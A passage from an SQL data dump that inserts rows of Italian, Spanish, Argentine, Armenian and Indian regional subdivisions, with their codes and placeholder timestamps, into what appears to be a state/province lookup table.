00:00:00',0,'0000-00-00 00:00:00',0),(225,1,105,0,'Bergamo','BEG','BG',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(226,1,105,0,'Biella','BIE','BI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(227,1,105,0,'Bologna','BOL','BO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(228,1,105,0,'Bolzano','BOZ','BZ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(229,1,105,0,'Brescia','BRE','BS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(230,1,105,0,'Brindisi','BRI','BR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(231,1,105,0,'Cagliari','CAG','CA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(232,1,105,0,'Caltanissetta','CAL','CL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(233,1,105,0,'Campobasso','CBO','CB',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(234,1,105,0,'Carbonia-Iglesias','CAR','CI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(235,1,105,0,'Caserta','CAS','CE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(236,1,105,0,'Catania','CAT','CT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(237,1,105,0,'Catanzaro','CTZ','CZ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(238,1,105,0,'Chieti','CHI','CH',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(239,1,105,0,'Como','COM','CO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(240,1,105,0,'Cosenza','COS','CS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(241,1,105,0,'Cremona','CRE','CR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(242,1,105,0,'Crotone','CRO','KR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(243,1,105,0,'Cuneo','CUN','CN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(244,1,105,0,'Enna','ENN','EN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(245,1,105,0,'Ferrara','FER','FE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(246,1,105,0,'Firenze','FIR','FI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(247,1,105,0,'Foggia','FOG','FG',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(248,1,105,0,'Forli-Cesena','FOC','FC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(249,1,105,0,'Frosinone','FRO','FR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(250,1,105,0,'Genova','GEN','GE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(251,1,105,0,'Gorizia','GOR','GO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(252,1,105,0,'Grosseto','GRO','GR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(253,1,105,0,'Imperia','IMP','IM',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(254,1,105,0,'Isernia','ISE','IS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(255,1,105,0,'L\'Aquila','AQU','AQ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(256,1,105,0,'La Spezia','LAS','SP',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(257,1,105,0,'Latina','LAT','LT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(258,1,105,0,'Lecce','LEC','LE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(259,1,105,0,'Lecco','LCC','LC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(260,1,105,0,'Livorno','LIV','LI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(261,1,105,0,'Lodi','LOD','LO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(262,1,105,0,'Lucca','LUC','LU',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(263,1,105,0,'Macerata','MAC','MC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(264,1,105,0,'Mantova','MAN','MN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(265,1,105,0,'Massa-Carrara','MAS','MS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(266,1,105,0,'Matera','MAA','MT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(267,1,105,0,'Medio Campidano','MED','VS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(268,1,105,0,'Messina','MES','ME',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(269,1,105,0,'Milano','MIL','MI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(270,1,105,0,'Modena','MOD','MO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(271,1,105,0,'Napoli','NAP','NA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(272,1,105,0,'Novara','NOV','NO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(273,1,105,0,'Nuoro','NUR','NU',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(274,1,105,0,'Ogliastra','OGL','OG',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(275,1,105,0,'Olbia-Tempio','OLB','OT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(276,1,105,0,'Oristano','ORI','OR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(277,1,105,0,'Padova','PDA','PD',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(278,1,105,0,'Palermo','PAL','PA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(279,1,105,0,'Parma','PAA','PR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(280,1,105,0,'Pavia','PAV','PV',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(281,1,105,0,'Perugia','PER','PG',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(282,1,105,0,'Pesaro e Urbino','PES','PU',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(283,1,105,0,'Pescara','PSC','PE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(284,1,105,0,'Piacenza','PIA','PC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(285,1,105,0,'Pisa','PIS','PI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(286,1,105,0,'Pistoia','PIT','PT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(287,1,105,0,'Pordenone','POR','PN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(288,1,105,0,'Potenza','PTZ','PZ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(289,1,105,0,'Prato','PRA','PO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(290,1,105,0,'Ragusa','RAG','RG',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(291,1,105,0,'Ravenna','RAV','RA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(292,1,105,0,'Reggio Calabria','REG','RC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(293,1,105,0,'Reggio Emilia','REE','RE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(294,1,105,0,'Rieti','RIE','RI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(295,1,105,0,'Rimini','RIM','RN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(296,1,105,0,'Roma','ROM','RM',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(297,1,105,0,'Rovigo','ROV','RO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(298,1,105,0,'Salerno','SAL','SA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(299,1,105,0,'Sassari','SAS','SS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(300,1,105,0,'Savona','SAV','SV',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(301,1,105,0,'Siena','SIE','SI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(302,1,105,0,'Siracusa','SIR','SR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(303,1,105,0,'Sondrio','SOO','SO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(304,1,105,0,'Taranto','TAR','TA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(305,1,105,0,'Teramo','TER','TE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(306,1,105,0,'Terni','TRN','TR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(307,1,105,0,'Torino','TOR','TO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(308,1,105,0,'Trapani','TRA','TP',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(309,1,105,0,'Trento','TRE','TN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(310,1,105,0,'Treviso','TRV','TV',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(311,1,105,0,'Trieste','TRI','TS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(312,1,105,0,'Udine','UDI','UD',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(313,1,105,0,'Varese','VAR','VA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(314,1,105,0,'Venezia','VEN','VE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(315,1,105,0,'Verbano Cusio Ossola','VCO','VB',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(316,1,105,0,'Vercelli','VER','VC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(317,1,105,0,'Verona','VRN','VR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(318,1,105,0,'Vibo Valenzia','VIV','VV',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(319,1,105,0,'Vicenza','VII','VI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(320,1,105,0,'Viterbo','VIT','VT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(321,1,195,0,'A Coru','ACO','15',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(322,1,195,0,'Alava','ALA','01',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(323,1,195,0,'Albacete','ALB','02',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(324,1,195,0,'Alicante','ALI','03',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(325,1,195,0,'Almeria','ALM','04',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(326,1,195,0,'Asturias','AST','33',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(327,1,195,0,'Avila','AVI','05',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(328,1,195,0,'Badajoz','BAD','06',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(329,1,195,0,'Baleares','BAL','07',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(330,1,195,0,'Barcelona','BAR','08',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(331,1,195,0,'Burgos','BUR','09',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(332,1,195,0,'Caceres','CAC','10',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(333,1,195,0,'Cadiz','CAD','11',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(334,1,195,0,'Cantabria','CAN','39',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(335,1,195,0,'Castellon','CAS','12',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(336,1,195,0,'Ceuta','CEU','51',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(337,1,195,0,'Ciudad Real','CIU','13',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(338,1,195,0,'Cordoba','COR','14',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(339,1,195,0,'Cuenca','CUE','16',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(340,1,195,0,'Girona','GIR','17',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(341,1,195,0,'Granada','GRA','18',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(342,1,195,0,'Guadalajara','GUA','19',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(343,1,195,0,'Guipuzcoa','GUI','20',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(344,1,195,0,'Huelva','HUL','21',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(345,1,195,0,'Huesca','HUS','22',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(346,1,195,0,'Jaen','JAE','23',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(347,1,195,0,'La Rioja','LRI','26',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(348,1,195,0,'Las Palmas','LPA','35',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(349,1,195,0,'Leon','LEO','24',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(350,1,195,0,'Lleida','LLE','25',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(351,1,195,0,'Lugo','LUG','27',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(352,1,195,0,'Madrid','MAD','28',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(353,1,195,0,'Malaga','MAL','29',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(354,1,195,0,'Melilla','MEL','52',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(355,1,195,0,'Murcia','MUR','30',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(356,1,195,0,'Navarra','NAV','31',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(357,1,195,0,'Ourense','OUR','32',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(358,1,195,0,'Palencia','PAL','34',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(359,1,195,0,'Pontevedra','PON','36',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(360,1,195,0,'Salamanca','SAL','37',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(361,1,195,0,'Santa Cruz de Tenerife','SCT','38',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(362,1,195,0,'Segovia','SEG','40',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(363,1,195,0,'Sevilla','SEV','41',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(364,1,195,0,'Soria','SOR','42',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(365,1,195,0,'Tarragona','TAR','43',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(366,1,195,0,'Teruel','TER','44',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(367,1,195,0,'Toledo','TOL','45',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(368,1,195,0,'Valencia','VAL','46',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(369,1,195,0,'Valladolid','VLL','47',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(370,1,195,0,'Vizcaya','VIZ','48',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(371,1,195,0,'Zamora','ZAM','49',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(372,1,195,0,'Zaragoza','ZAR','50',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(373,1,10,0,'Buenos Aires','BAS','BA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(374,1,10,0,'Ciudad Autonoma De Buenos Aires','CBA','CB',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(375,1,10,0,'Catamarca','CAT','CA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(376,1,10,0,'Chaco','CHO','CH',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(377,1,10,0,'Chubut','CTT','CT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(378,1,10,0,'Cordoba','COD','CO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(379,1,10,0,'Corrientes','CRI','CR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(380,1,10,0,'Entre Rios','ERS','ER',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(381,1,10,0,'Formosa','FRM','FR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(382,1,10,0,'Jujuy','JUJ','JU',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(383,1,10,0,'La Pampa','LPM','LP',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(384,1,10,0,'La Rioja','LRI','LR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(385,1,10,0,'Mendoza','MED','ME',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(386,1,10,0,'Misiones','MIS','MI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(387,1,10,0,'Neuquen','NQU','NQ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(388,1,10,0,'Rio Negro','RNG','RN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(389,1,10,0,'Salta','SAL','SA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(390,1,10,0,'San Juan','SJN','SJ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(391,1,10,0,'San Luis','SLU','SL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(392,1,10,0,'Santa Cruz','SCZ','SC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(393,1,10,0,'Santa Fe','SFE','SF',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(394,1,10,0,'Santiago Del Estero','SEN','SE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(395,1,10,0,'Tierra Del Fuego','TFE','TF',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(396,1,10,0,'Tucuman','TUC','TU',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(397,1,11,0,'Aragatsotn','ARG','AG',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(398,1,11,0,'Ararat','ARR','AR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(399,1,11,0,'Armavir','ARM','AV',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(400,1,11,0,'Gegharkunik','GEG','GR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(401,1,11,0,'Kotayk','KOT','KT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(402,1,11,0,'Lori','LOR','LO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(403,1,11,0,'Shirak','SHI','SH',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(404,1,11,0,'Syunik','SYU','SU',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(405,1,11,0,'Tavush','TAV','TV',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(406,1,11,0,'Vayots-Dzor','VAD','VD',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(407,1,11,0,'Yerevan','YER','ER',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(408,1,99,0,'Andaman & Nicobar Islands','ANI','AI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(409,1,99,0,'Andhra Pradesh','AND','AN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(410,1,99,0,'Arunachal Pradesh','ARU','AR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(411,1,99,0,'Assam','ASS','AS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(412,1,99,0,'Bihar','BIH','BI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(413,1,99,0,'Chandigarh','CHA','CA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(414,1,99,0,'Chhatisgarh','CHH','CH',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(415,1,99,0,'Dadra & Nagar Haveli','DAD','DD',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(416,1,99,0,'Daman & Diu','DAM','DA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(417,1,99,0,'Delhi','DEL','DE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(418,1,99,0,'Goa','GOA','GO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(419,1,99,0,'Gujarat','GUJ','GU',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 